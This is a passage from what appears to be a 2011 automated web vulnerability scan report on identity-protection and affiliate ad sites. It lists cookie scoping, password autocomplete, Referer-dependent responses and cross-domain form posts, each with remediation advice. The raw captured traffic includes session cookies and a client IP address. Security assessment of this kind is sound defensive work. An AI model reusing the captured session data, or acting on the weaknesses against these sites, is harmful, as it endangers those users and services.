TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gscc.aspx?mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1 Host: www.identityguard.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: URLParams=mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; cmTPSet=Y; CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.1.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615498489
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon HTTP/1.1 Host: www.lifelock.com Proxy-Connection: keep-alive Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; LifeLockEnrollment=promoCode=GOOGSEARCH13; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idguard&id=223 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en¤cy=USD&subdomain=HCAU&channel=home&Section=main&adsize=160x600&pos=external&country=US HTTP/1.1 Host: www.revresda.com Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=160x600&pos=external User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:09:47 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: NGUserID=aeb2031-15587-1426029262-3; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/ AdServer: egadserv002p.prod.orbitz.net:9678:1 P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR" Cteonnt-Length: 720 Content-Type: application/x-javascript Cache-Control: private Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/ Content-Length: 720
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en¤cy=USD&subdomain=HCAU&channel=home&Section=main&adsize=728x90&pos=bottom&country=US HTTP/1.1 Host: www.revresda.com Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:09:47 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: NGUserID=aeba024-26908-1353408694-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/ AdServer: egadserv001p.prod.orbitz.net:9678:1 P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR" Cteonnt-Length: 195 Content-Type: application/x-javascript Cache-Control: private Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/ Content-Length: 195
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet HTTP/1.1 Host: www.securepaynet.net Proxy-Connection: keep-alive Referer: http://kroogy.com/pub/banner_728_90_random.php User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=h05vhh55un4r0t3lzxjaq3m2; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: adc471557=US; domain=securepaynet.net; path=/ Set-Cookie: flag471557=cflag=us; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/ Set-Cookie: currency471557=potableSourceStr=USD; domain=securepaynet.net; expires=Mon, 23-Apr-2012 12:42:00 GMT; path=/ Set-Cookie: currencypopin471557=cdisplaypopin=false; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/ Set-Cookie: SplitValue471557=16; domain=securepaynet.net; expires=Mon, 25-Apr-2011 12:42:00 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=16; domain=securepaynet.net; path=/ X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sun, 24 Apr 2011 12:42:01 GMT Content-Length: 156097
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; domain=securepaynet.net; path=/ X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sun, 24 Apr 2011 12:42:20 GMT Content-Length: 124
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1 Host: www.trustedid.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /registration.php?promoRefCode=NXTIDF01IDEFT HTTP/1.1 Host: www.trustedid.com Connection: keep-alive Referer: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /suzeidprotector/?promoRefCode=NXDIRSUZIDPANN HTTP/1.1 Host: www.trustedid.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Identity Theft Protection from Suze Orman</title> <meta content= ...[SNIP]...
15. Password field with autocomplete enabledpreviousnext There are 10 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <html> <head> <title>LifeLock Member Portal | Sign In</title> <link href="../styles/login.css" rel="stylesheet" type="text/css" med ...[SNIP]... <div id="login-content">
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <html> <head> <title>LifeLock Member Portal | Sign In</title> <link href="../styles/login.css" rel="stylesheet" type="text/css" med ...[SNIP]... <div id="login-content">
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <html> <head> <title>LifeLock Member Portal | Sign In</title> <link href="../styles/login.css" rel="stylesheet" type="text/css" med ...[SNIP]... <div id="login-content">
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <html> <head> <title>LifeLock Member Portal | Sign In</title> <link href="../styles/login.css" rel="stylesheet" type="text/css" med ...[SNIP]... <div id="login-content">
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <html> <head> <title>LifeLock Member Portal | Sign In</title> <link href="../styles/login.css" rel="stylesheet" type="text/css" med ...[SNIP]... <div id="login-content">
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <html> <head> <title>LifeLock Member Portal | Sign In</title> <link href="../styles/login.css" rel="stylesheet" type="text/css" med ...[SNIP]... <div id="login-content">
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <html> <head> <title>LifeLock Member Portal | Sign In</title> <link href="../styles/login.css" rel="stylesheet" type="text/css" med ...[SNIP]... <div id="login-content">
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.
The page contains a form which POSTs data to the domain www.protectmyid.com. The form contains the following fields:
fname
lname
email
straddr
city
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
zip
reside
reside
pkgid
areaid
bcd
Submit
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
Request
GET /pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=78334213420748700&clkurl=http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1 Host: ad.amgdgt.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; 